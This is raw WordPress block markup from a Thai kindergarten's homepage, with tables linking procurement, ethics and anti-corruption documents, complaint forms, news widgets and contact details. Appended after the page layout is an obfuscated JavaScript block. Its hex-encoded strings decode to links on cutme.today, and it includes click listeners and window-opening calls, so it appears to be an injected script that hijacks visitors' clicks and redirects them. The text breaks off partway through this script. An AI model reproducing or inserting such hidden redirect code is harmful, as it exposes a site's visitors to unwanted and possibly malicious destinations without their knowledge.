300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x6